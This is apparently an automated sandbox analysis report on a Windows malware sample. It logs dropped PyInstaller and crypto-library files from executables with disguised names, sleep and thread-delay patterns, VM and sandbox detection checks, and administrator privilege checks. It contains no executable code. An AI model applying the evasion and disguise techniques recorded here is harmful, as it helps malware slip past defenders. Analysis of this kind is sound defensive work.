Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\LineInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\LineInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\LineInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\LineInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\LineInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\LineInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\LineInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\LineInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\LineInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\LineInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\LineInst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\$Windows.~WS\Sources\SetupHost.exeSystem information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT)
Source: C:\Users\user\AppData\WinHex.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05DF8D13-C355-47F4-A11E-851B338CEFB8}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7058Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2548Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8223Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1097Jump to behavior
Source: C:\Users\user\AppData\WinHex.exeWindow / User API: threadDelayed 732
Source: C:\Users\user\AppData\SystemUpdate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80722\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80722\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73322\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80722\python38.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80722\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\select.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\wdsutil.dllJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80722\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73322\select.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73322\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\wdstptc.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\DiagTrack.dllJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\SetupCore.dllJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80722\select.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\wdsclientapi.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80722\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\wdsimage.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80722\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73322\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73322\python38.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\pidgenx.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80722\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80722\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\SetupMgr.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73322\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\DU.dllJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\wdscsl.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\wpx.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\python38.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\MediaSetupUIMgr.dllJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73322\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73322\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\DiagTrackRunner.exeJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73322\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73322\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\Diager.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\setupplatform.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\$Windows.~WS\Sources\SetupHost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_13-39892
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-16096
Source: C:\Users\user\AppData\SystemUpdate.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\$Windows.~WS\Sources\SetupHost.exeAPI coverage: 9.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep count: 7058 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep count: 2548 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep count: 8223 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 1097 > 30Jump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exe TID: 7916Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\WinHex.exe TID: 2000Thread sleep count: 255 > 30
Source: C:\Users\user\AppData\WinHex.exe TID: 4520Thread sleep count: 732 > 30
